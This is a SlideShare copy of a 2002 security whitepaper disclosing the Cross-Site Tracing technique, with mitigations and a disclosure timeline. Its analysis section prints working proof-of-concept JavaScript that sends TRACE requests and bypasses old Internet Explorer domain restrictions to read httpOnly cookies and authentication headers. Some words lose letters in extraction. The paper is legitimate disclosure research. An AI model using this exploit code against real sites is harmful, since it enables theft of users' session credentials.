SlideShare a Scribd company logo

XST - Cross Site Tracing

Magno Logan
Magno Logan

XST - Cross Site Tracing By Jeremiah Grossman - WhiteHat Security

Technology
1 of 14
Download to read offline
CROSS-SITE TRACING (XST) THE NEW TECHNIQUES AND EMERGING THREATS TO BYPASS CURRENT WEB SECURITY MEASURES USING TRACE AND XSS. Jeremiah Grossman //
Warranties and Disclaimers         “ ”     ,    , ,    ,     ,    ,  -.  , ..             ,   .      , .     ,         , ,        ,  ,      , , ,      ,              .         .        ;           .  , .    /    (), (), / ()    .
Overview October 23 2002, Microso issued a press release describing a new browser/server based protective security measure within of internet explorer 6 sp1. is new feature, dubbed “httponly”, helps guard http cookies against xss (cross-site scripting) attack. WhiteHat Security, heavily focused on web application security research and technology, began to investigate the feature in order to determine what it meant to web security. First of all, anything that attempts to help prevent the xss plague on the web is a good thing. Most of us in the web application security field already know the great pains required to prevent the ever-present existence of xss issues. Aer much security review, I posted to bugtraq stating that the new httpOnly security feature, which is nicely effective for the intended purpose, is limited in xss protection scope. Limited in that the security feature only prohibits the exposure of cookie data through the “document.cookie” object. However, Microso has taken an excellent first step in the right direction to prevent xss as a whole. A week later into testing of httpOnly, WhiteHat staff discovered a new web security attack technique that is able not only to bypass the httpOnly mechanism present in i.e. 6 service pack 1, but in addition the ability to xss “just about” anything from “just about” anywhere. is technique allows client-side scripting languages, such as javascript, and possibly other client-side technologies like vbscript, flash, java, etc., the ability access http web authentication credentials, with the added bonus of achieving this result over ssl. is ability has never before been previously possible. ese new exposures will be explained with detail in the proceeding sections to illustrate the concepts.
Background Information TRACE Request Method “Trace” is used simply as an input data echo mechanism for the http protocol. is request method is commonly used for debug and other connection analysis activities. e http trace request (containing request line, headers, post data), sent to a trace supporting web server, will respond to the client with the information contained in the request. Trace provides any easy to way to tell what an http client is sending and what the server is receiving. Apache, IIS, and iPlanet all support trace as defined by the HTTP/1.1 RFC and is currently enabled by default. Very few system administrators have disabled this request method either because the method posed no known risk, default settings were considered good enough or simply had no option to do so. e following is an example of a TRACE request: $ telnet foo.com 80 Trying 127.0.0.1... Connected to foo.bar. Escape character is ‘^]’. TRACE / HTTP/1.1 Host: foo.bar X-Header: test HTTP/1.1 200 OK Date: Mon, 02 Dec 2002 19:24:51 GMT Server: Apache/2.0.40 (Unix) Content-Type: message/http TRACE / HTTP/1.1 Host: foo.bar X-Header: test As shown in the example, the server responded with the information sent by the client to the server. What sites currently have TRACE enabled? • www.passport.com • www.yahoo.com • www.disney.com • www.securityfocus.com • www.redhat.com • www.go.com • www.theregister.co.uk • www.sun.com • www.oracle.com • www.ibm.com (Many other web sites) httpOnly Cookie Option httpOnly is a HTTP Cookie option used to inform the browser (IE 6 only until other browsers support httpOnly) not to allow scripting languages (JavaScript, VBScript, etc.) access to the “document.cookie” object (normal XSS attack target). e syntax of an httpOnly cookie is as follows:
Set-Cookie: name=value; httpOnly Using JavaScript we can test the effectiveness of the feature. (Code tested in IE 6 SP1) <script type=”text/javascript”> <!-- function normalCookie() { document.cookie = “TheCookieName=CookieValue_httpOnly”; alert(document.cookie); } function httpOnlyCookie() { document.cookie = “TheCookieName=CookieValue_httpOnly; httpOnly”; alert(document.cookie); } //--> </script> <FORM> <INPUT TYPE=BUTTON OnClick=”normalCookie();” VALUE=’Display Normal Cookie’> <INPUT TYPE=BUTTON OnClick=”httpOnlyCookie();” VALUE=’Display HTTPONLY Cookie’> </FORM> Code Example 1. Screen Shot 1: aer pressing the “Display Normal Cookie” button. Screen Shot 2 : Aer pressing the “Display HTTPONLY Cookie’” button. By testing the above code, you can quickly see that when httpOnly setting is in use, the “document.cookie” function allows access to the object, but the string returns empty. is becomes a useful security enhancement for many web applications.
Analysis e first challenge is to gain access to the cookie data string normally contained in “document.cookie” while httpOnly is in use. e idea became to identify where the data within “document.cookie” is located besides within, of course, “document.cookie”. is is where TRACE’s usefulness for our purposes becomes clear. TRACE will echo the information you send in the HTTP Request. is includes cookie and Web Authentication strings, since they are just simple HTTP headers themselves. However, it is not a simple process forcing Internet Explorer to send a TRACE request, even while first considering the use HTML Form (METHOD=POST). In fact, Internet Explorer does not support request methods other than GET or POST while using an HTML form. To resolve this limitation, we had to utilize extended client-side scripting technologies to create and send a specially formatted HTTP request to a target web server. Many technologies are capable of performing specially craed HTTP request. <script type=”text/javascript”> <!-- function sendTrace () { var xmlHttp = new ActiveXObject(“Microsoft.XMLHTTP”); xmlHttp.open(“TRACE”, “http://foo.bar”,false); xmlHttp.send(); xmlDoc=xmlHttp.responseText; alert(xmlDoc); } //--> </script> <INPUT TYPE=BUTTON OnClick=”sendTrace();” VALUE=”Send Trace Request”> Code Example 2. (Will need to change the URL in the code) Screen Shot 3: Results of the TRACE request response from the server. Note the cookie string contained and accessible by means other than “document.cookie”.
e above code, using the ActiveX control XMLHTTP, will send a TRACE request to the target web server. e server will then echo, if it supports TRACE, the information sent within the HTTP request. Internet Explorer will send general browser headers by default that will be displayed via a resulting JavaScript alert window. If your browser happens to have a cookie from the target domain or is logged into the target web server using web authentication, you will be able to see your cookies and credentials present within the alert. is technique successfully grants the code ability bypass “httpOnly”, while accessing cookie data without the use of “document.cookie”. We now have the desired capability to pass sensitive credentials off-domain to a third-party. Also as stated in the overview, the ability to access web authentication credentials not before possible using client-side script. To restate, all the sensitive information is still accessible even over an SSL link. It is important to note two things at this point. e first is ability to do these types of request using a web browser is NOT limited to Internet Explorer. Other web browsers such as Mozilla/Netscape possess the ability as well. Specifically, TRACE requests have been achieved in Mozilla using XMLDOM object scripting. e second, XMLHTTP, is only one of several ActiveX controls and other technologies, which appear have this control over HTTP within a browser environment. ere is however at this point a limiting factor preventing wider a danger escalation. e TRACE connection made by the browser, will NOT be allowed by the browser, to connect to anything other than the domain hosting the actual script content. A foo.bar script domain will only be able to TRACE and connect to a foo.bar domain host. is is a browser implemented domain restriction security policy. e domain restriction policy helps prevent XSS and other similar attacks from occurring. is technical exploit limitation does prevent further abuse, however, this hurdle can be bypassed as well as shown below. To increase the exposure of the exploit, we are in need of a domain-restriction-bypass vulnerability within Internet Explorer (or web browser of choice). As it turns out, these issues are quite numerous and can be commonly found posted to public resource forums such as bugtraq. Recently and currently, there have been known unresolved issue with the IE Domain Restriction policies. ese un-patched Internet Explorer 6 flaws, allow the ability to bypass the domain restriction security policy, and increase the overall severity of the problem. is IE issue uses the “external” browser flaw in the caching mechanism. And was first identified by GreyMagic Security.
<script type=”text/javascript”> <!-- function xssDomain() { var oWin=open(“blank.html”,”victim”,”width=500,height=400”); var oVuln=oWin.external; oWin.location.href=”http://foo.bar”; setTimeout( function () { oVuln.NavigateAndFind(‘javascript:xmlHttp=new ActiveXObject(“Microsoft.XMLHTTP”);xmlHttp.open(“TRACE”,”http://foo.bar”,false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(“Show all headers for foo.com including cookie without using document.cookie n” + xmlDoc);’,””,””); }, 2000 ); } //--> </script> <INPUT TYPE=BUTTON OnClick=”xssDomain();” VALUE=’TRACE XSS Domain’> Code Example 3. (Code will not work post the MS02-068 roll-up which resolves the issue). However a working code example (4) below, as of this writing, does function. URLs in the code will need to be changed to identify a target. <script type=”text/javascript”> function xssDomainTraceRequest(){ var exampleCode = “var xmlHttp = new ActiveXObject( ”Microsoft.XMLHTTP”);xmlHttp.open(”TRACE”,”http://foo.bar”,false) ;xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(xmlDoc);”; var target = “http://foo.bar”; cExampleCode = encodeURIComponent(exampleCode + ‘;top.close()’); var readyCode = ‘font-size:expression(execScript(decodeURIComponent(“’ + cExampleCode + ‘”)))’; showModalDialog(target, null, readyCode); } </script> <INPUT TYPE=BUTTON OnClick=”xssDomainTraceRequest()” VALUE=”Show Cookie Information Using TRACE”> Code Example 4. (Functional as of this writing) is IE issue uses a flaw within “showModalDialog”. Gathered from or Larholm on http://www.pivx.com/ e URLs in the code will need to be changed to identify a target.
Screen Shot 4: Results of the TRACE request response from the server. Note the base64 authentication string contained and now accessible. ese scripts now have the ability to connect to any domain, access cookies, and web authentication information, while NOT utilizing document.cookie and/or being restricted by domain security policy. What does this mean for exposure scenarios? Read On.
Exposure Scenarios We will outline a few exposure scenarios while using varying degrees of security assumptions. Attempting to organize the scenarios by level of risk severity. Defining some necessary technologies and acronyms to better understand exposure at several levels. Domain Restriction Bypass (DRB) e ability for a client-side script to bypass domain restriction security policy enabled within a web browser. HTTP Request Enabling Technology (HRET) Client-side technologies resident within a web browser, which allow for the creation and sending of specially formatted HTTP Requests. ese technologies may include, but not all confirmed, JavaScript, VBScript, Flash, Java, ActiveX, Jscript, Action Script, Shockwave, etc.. TRACE Method Support (TMS) A target web server that currently supports the TRACE request method. “Credentials” will include cookie data and web authentication credentials. Scenarios assume the following: A user visits a malicious web site or views malicious content hosted by a trusted source (message board, web mail, etc..) and loads code similar to code example 3 & 4. Scenario 1. (DRB, HRET, TMS) All the required insecurities are present in today’s environment. Code may access any and all of the user credentials from any domain that supports TRACE including bypass httpOnly. XSS “just about” anyone from “just about anywhere”. Scenario 2. (HRET, TMS) Code may access any and all of the user credentials from the “hosting code” domain including bypass httpOnly. Scenario 3. (DRB, HRET) User credentials from target domain are safe due to the server not supporting or disallowing TRACE. However, other security concerns beyond the scope of this paper are present. Scenario 4. (HRET) User credentials from target domain are safe due to the server not supporting or disallowing TRACE. No other security concerns beyond the scope of this paper persist.
General Recommendations 1. Sufficiently patch all web browsers against known domain restriction bypass flaws. is is a more important part of security policy now more than ever. 2. Disable or disallow the TRACE Request method on production and development (unless needed) web servers. 3. Web server vendors should update their web server packages to disable TRACE by default. 4. Web server vendors should inform their users on how to disable or disallow TRACE on existing web servers. 5. ActiveX controls supporting arbitrary HTTP request should be marked unsafe for scripting by default. Other such technology vendors (Flash, Java, Shockwave, VBScript, etc..) should attempt to implement greater security mechanisms regarding disallowing unauthorized HTTP requests. 6. Users have the ability to disable all active scripting and increase the safety of their credentials. However, this may negatively impact the functionality of many web sites.
Server Specific Recommendations (Resolutions should be confirmed by appropriate vendor) IIS • URL Scan Apache • Source Code Modification • Mod_Rewrite Module RewriteEngine onRewriteCond %{REQUEST_METHOD} ^TRACERewriteRule .* – [F] (ank you to Rain Forest Puppy) ** e Limit or LimitExcept directive in the httpd.conf file does not appear to be able to restrict TRACE. ** Netscape iPlanet (Procedures for removing unwanted Request Methods) cd ${IPLANET_ROOT} mkdir secure_lib cp bin/https/lib/libns-httpd40.so secure_lib cd secure_lib emacs libnc-httpd40.so e supported methods appear in lists like: HEAD^@GET^@PUT^@POST^@DELETE^ @TRACE^@OPTIONS^@MOVE^@INDEX^@MKDIR^@RMDIR • Find all occurrences of these lists and change the methods as required to be GET padded with spaces to match the length of the word. I.e. DELETE becomes ‘GET ‘ (three spaces) • edit the start script for the web server to protect and prepend the secure_lib at the front of the LD_LIBRARY_PATH. i.e. LD_LIBRARY_PATH=${IPLANET_ROOT}/secure_lib: <the rest of the line as it appears in the script> • re-start the web server and test it still works! (Many thanks to Alastair Davie and Robert Rodger.)
References Some Answered Questions. Q: Does this affect only Internet Explorer? A: No, this new technique may affect all browser supporting HTTP Request Enabling Technologies (HRET). Q: Does this exploit technique require ActiveX? A: ActiveX is used in our examples, however research has shown other similar technologies posses the same abilities. Q: If I turn off Active Scripting, as a user, am I safe? A: You could be “safer” but not safe. As previously said, other technologies such as Flash and Java may still pose a threat even if Active Scripting is disabled. Q: As a web server administrator, if I disable TRACE are my users credentials safe? A: Yes, this appears to be the case. Users of your “domain” would be safe against this new technique since your web server no longer echoes sensitive information in TRACE requests. Q: Are my users credentials at risk even though my applications are not vulnerable to XSS at the application layer? A: Yes. e particular attack vector of this XSS issue targets the web server itself rather than the web application layer. Q: Why should I have to reconfigure my web server, this sounds like a browser client-side issue? A: e security of the web browsers in use should be indeed secured as well as the web server. However, if the web server itself is not configured to deny TRACE, then the security of the domain credentials will reside in the security of the web browser. Not a good idea.
Issue Discovery & Disclosure Time line November 1, 2002. httpOnly bypass issue identified. November 28, 2002. Increased Exposure identified. December 4, 2002. Issue disclosed and confirmed by Tim Mullen December 4, 2002. Issue disclosed and confirmed by Ryan Russell December 5, 2002. Issue disclosed and confirmed by Steve Christey (Mitre) December 6, 2002. Issue disclosed and confirmed by Rain Forest Puppy (Wiretrip.net) December 10, 2002. Issue disclosed and confirmed by CERT. January 20, 2003. Issue publicly disclosed by WhiteHat. Credits & anks Robert Auger: For help with security research, vulnerability identification, and mirror help. Rain Forest Puppy: For help with vulnerability confirmation, security resolutions research and the XST title. Tim Mullen: For help with vulnerability confirmation and security resolutions Steve Christey: For help with vulnerability confirmation and feedback Ryan Russell: For help with vulnerability confirmation Robert Rodger: For help with iPlanet vulnerability confirmation and remediation Alastair Davie: For help with iPlanet vulnerability confirmation and remediation

Recommended

SMB Guide-to-Ransomware
SMB Guide-to-RansomwareSMB Guide-to-Ransomware
SMB Guide-to-RansomwareDave Augustine
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INVijay Sarathy Rangayyan
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS AttacksJignesh Patel
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
ITPG Secure on WannaCry
ITPG Secure on WannaCryITPG Secure on WannaCry
ITPG Secure on WannaCryITPG Secure Compliance and Certification Training
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Linuxmalaysia Malaysia
 

Recommended

SMB Guide-to-Ransomware
SMB Guide-to-RansomwareSMB Guide-to-Ransomware
SMB Guide-to-RansomwareDave Augustine
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INVijay Sarathy Rangayyan
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS AttacksJignesh Patel
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2ratnalajaggu
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hackingAmanpreet Singh
 
Freeware Security Tools You Need
Freeware Security Tools You NeedFreeware Security Tools You Need
Freeware Security Tools You Needamiable_indian
 
ITPG Secure on WannaCry
ITPG Secure on WannaCryITPG Secure on WannaCry
ITPG Secure on WannaCryITPG Secure Compliance and Certification Training
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Linuxmalaysia Malaysia
 
WannaCry? No Thanks!
WannaCry? No Thanks!WannaCry? No Thanks!
WannaCry? No Thanks!Roberto Martelloni
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Ishan Girdhar
 
Days of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, IncidentsDays of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, IncidentsAnton Chuvakin
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to Respond42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to RespondThomas Roccia
 
Defeating spyware and forensics on the black berry draft
Defeating spyware and forensics on the black berry draftDefeating spyware and forensics on the black berry draft
Defeating spyware and forensics on the black berry draftidsecconf
 
Talk of the hour, the wanna crypt ransomware
Talk of the hour, the wanna crypt ransomwareTalk of the hour, the wanna crypt ransomware
Talk of the hour, the wanna crypt ransomwareshubaira
 
Hackers The Anarchists Of Our Time
Hackers The Anarchists Of Our TimeHackers The Anarchists Of Our Time
Hackers The Anarchists Of Our TimeUtkarsh Sengar
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallHuda Seyam
 
WannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to knowWannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to knowSymantec Security Response
 
Introduction to trojans and backdoors
Introduction to trojans and backdoorsIntroduction to trojans and backdoors
Introduction to trojans and backdoorsjibinmanjooran
 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareShan Kumar
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceAsep Sopyan
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationAsep Sopyan
 
Malware Evasion Techniques
Malware Evasion TechniquesMalware Evasion Techniques
Malware Evasion TechniquesThomas Roccia
 
勒索軟體態勢與應措
勒索軟體態勢與應措勒索軟體態勢與應措
勒索軟體態勢與應措jack51706
 
Ransomware
Ransomware Ransomware
Ransomware Deepak Kumar (D3)
 
Software Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical SecuritySoftware Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical SecurityNicholas Davis
 
White paper screen
White paper screenWhite paper screen
White paper screeneltincho89
 
Browser security
Browser securityBrowser security
Browser securityUday Anand
 

More Related Content

What's hot

Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Ishan Girdhar
 
Days of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, IncidentsDays of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, IncidentsAnton Chuvakin
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksAsep Sopyan
 
42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to Respond42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to RespondThomas Roccia
 
Defeating spyware and forensics on the black berry draft
Defeating spyware and forensics on the black berry draftDefeating spyware and forensics on the black berry draft
Defeating spyware and forensics on the black berry draftidsecconf
 
Talk of the hour, the wanna crypt ransomware
Talk of the hour, the wanna crypt ransomwareTalk of the hour, the wanna crypt ransomware
Talk of the hour, the wanna crypt ransomwareshubaira
 
Hackers The Anarchists Of Our Time
Hackers The Anarchists Of Our TimeHackers The Anarchists Of Our Time
Hackers The Anarchists Of Our TimeUtkarsh Sengar
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallHuda Seyam
 
WannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to knowWannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to knowSymantec Security Response
 
Introduction to trojans and backdoors
Introduction to trojans and backdoorsIntroduction to trojans and backdoors
Introduction to trojans and backdoorsjibinmanjooran
 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareShan Kumar
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceAsep Sopyan
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationAsep Sopyan
 
Malware Evasion Techniques
Malware Evasion TechniquesMalware Evasion Techniques
Malware Evasion TechniquesThomas Roccia
 
勒索軟體態勢與應措
勒索軟體態勢與應措勒索軟體態勢與應措
勒索軟體態勢與應措jack51706
 
Software Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical SecuritySoftware Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical SecurityNicholas Davis
 

What's hot (20)

WannaCry? No Thanks!
WannaCry? No Thanks!WannaCry? No Thanks!
WannaCry? No Thanks!
 
Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit Armitage – The Ultimate Attack Platform for Metasploit
Armitage – The Ultimate Attack Platform for Metasploit
 
Days of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, IncidentsDays of the Honeynet: Attacks, Tools, Incidents
Days of the Honeynet: Attacks, Tools, Incidents
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
 
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for AssociatesSyed Ubaid Ali Jafri - Black Box Penetration testing for Associates
Syed Ubaid Ali Jafri - Black Box Penetration testing for Associates
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
 
42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to Respond42 - Malware - Understand the Threat and How to Respond
42 - Malware - Understand the Threat and How to Respond
 
Defeating spyware and forensics on the black berry draft
Defeating spyware and forensics on the black berry draftDefeating spyware and forensics on the black berry draft
Defeating spyware and forensics on the black berry draft
 
Talk of the hour, the wanna crypt ransomware
Talk of the hour, the wanna crypt ransomwareTalk of the hour, the wanna crypt ransomware
Talk of the hour, the wanna crypt ransomware
 
Hackers The Anarchists Of Our Time
Hackers The Anarchists Of Our TimeHackers The Anarchists Of Our Time
Hackers The Anarchists Of Our Time
 
Snort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense FirewallSnort Intrusion Detection / Prevention System on PFSense Firewall
Snort Intrusion Detection / Prevention System on PFSense Firewall
 
WannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to knowWannaCry ransomware outbreak - what you need to know
WannaCry ransomware outbreak - what you need to know
 
Introduction to trojans and backdoors
Introduction to trojans and backdoorsIntroduction to trojans and backdoors
Introduction to trojans and backdoors
 
Report_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_SpywareReport_Honeypots_Trojans_Spyware
Report_Honeypots_Trojans_Spyware
 
Ceh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of serviceCeh v8 labs module 10 denial of service
Ceh v8 labs module 10 denial of service
 
Ceh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumerationCeh v8 labs module 04 enumeration
Ceh v8 labs module 04 enumeration
 
Malware Evasion Techniques
Malware Evasion TechniquesMalware Evasion Techniques
Malware Evasion Techniques
 
勒索軟體態勢與應措
勒索軟體態勢與應措勒索軟體態勢與應措
勒索軟體態勢與應措
 
Ransomware
Ransomware Ransomware
Ransomware
 
Software Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical SecuritySoftware Security (Vulnerabilities) And Physical Security
Software Security (Vulnerabilities) And Physical Security
 

Similar to XST - Cross Site Tracing

White paper screen
White paper screenWhite paper screen
White paper screeneltincho89
 
Browser security
Browser securityBrowser security
Browser securityUday Anand
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Xss.e xopresentation from eXo SEA
Xss.e xopresentation from eXo SEAXss.e xopresentation from eXo SEA
Xss.e xopresentation from eXo SEAThuy_Dang
 
V2 peter-lubbers-sf-jug-websocket
V2 peter-lubbers-sf-jug-websocketV2 peter-lubbers-sf-jug-websocket
V2 peter-lubbers-sf-jug-websocketbrent bucci
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Jeremiah Grossman
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
HTML5 WebSocket: The New Network Stack for the Web
HTML5 WebSocket: The New Network Stack for the WebHTML5 WebSocket: The New Network Stack for the Web
HTML5 WebSocket: The New Network Stack for the WebPeter Lubbers
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooNahidul Kibria
 
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...Thomas Witt
 
Web 20 Security - Vordel
Web 20 Security - VordelWeb 20 Security - Vordel
Web 20 Security - Vordelguest2a1135
 
List of useful security related http headers
List of useful security related http headersList of useful security related http headers
List of useful security related http headers한익 주
 
Java Web Security Class
Java Web Security ClassJava Web Security Class
Java Web Security ClassRich Helton
 

Similar to XST - Cross Site Tracing (20)

White paper screen
White paper screenWhite paper screen
White paper screen
 
Browser security
Browser securityBrowser security
Browser security
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Xss.e xopresentation from eXo SEA
Xss.e xopresentation from eXo SEAXss.e xopresentation from eXo SEA
Xss.e xopresentation from eXo SEA
 
V2 peter-lubbers-sf-jug-websocket
V2 peter-lubbers-sf-jug-websocketV2 peter-lubbers-sf-jug-websocket
V2 peter-lubbers-sf-jug-websocket
 
Attack with-html5
Attack with-html5Attack with-html5
Attack with-html5
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
Identifying Web Servers: A First-look Into the Future of Web Server Fingerpri...
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
HTML5 WebSocket: The New Network Stack for the Web
HTML5 WebSocket: The New Network Stack for the WebHTML5 WebSocket: The New Network Stack for the Web
HTML5 WebSocket: The New Network Stack for the Web
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
JavaScript Security: Mastering Cross Domain Communications in complex JS appl...
